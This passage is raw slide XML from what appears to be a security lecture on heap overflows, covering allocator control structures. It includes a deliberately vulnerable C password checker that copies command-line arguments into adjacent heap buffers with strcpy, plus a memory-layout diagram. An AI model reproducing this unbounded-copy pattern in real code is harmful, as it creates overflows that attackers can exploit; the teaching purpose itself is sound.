              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="107820367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80" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is Overwritten: Heap Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022981" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap is the area of memory that is dynamically allocated through the “malloc” family of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>malloc(), calloc(), realloc(), free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>new(), delete()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>functions that return dynamically allocated memory, e.g., strdup()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The heap grows towards higher memory addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Memory allocated on the heap survives the function that created it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15371622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r>
              <a:rPr lang="en-US"/>
              <a:t>Heap Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1080323" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In most heap implementations, memory management is done through in-band control structures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These control structures can be manipulated through heap overflows to execute arbitrary code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architecture/OS-dependent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The details of the attack depend on the library used for heap management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Doug Lea’s malloc library: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dlmalloc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pthreads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malloc library: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ptmalloc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>glibc’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> malloc library: the GNU Allocator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Details at </a:t>
            </a:r>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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420919702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20" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Simple Heap Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033221" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define BUFSIZE 128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>#define DEBUG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>int main(int argc, char* argv[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *passwd = (char *)malloc(BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *username = (char *)malloc(BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  struct passwd* entry = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  char *salt = NULL;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (argc &lt; 3) {...}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  strcpy(username, argv[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  strcpy(passwd, argv[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  entry = getpwnam(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (entry == NULL) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "Wrong username %s\n”, username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    goto end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (strncmp(entry-&gt;pw_passwd, "$1$", 3)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    fprintf(stderr, "No MD5 password available\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    goto end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1033222" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> salt = entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pw_passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(entry-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pw_passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, (char *)crypt(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, salt))) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, "Wrong password %s for user %s\n”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> end:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>stderr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  free(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  return -1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23839902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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple Heap Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077253" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1885950"/>
            <a:ext cx="1295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control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077254" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="1885950"/>
            <a:ext cx="23622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passwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077255" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1885950"/>
            <a:ext cx="19812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username</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077256" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="1885950"/>
            <a:ext cx="1295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control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077257" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="1526382"/>
            <a:ext cx="1253869" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x08fe3008</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077258" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="1539479"/>
            <a:ext cx="1253869" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>0x08fe3090</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077259" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304801" y="2239567"/>
            <a:ext cx="7492981" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>% test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>vigna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
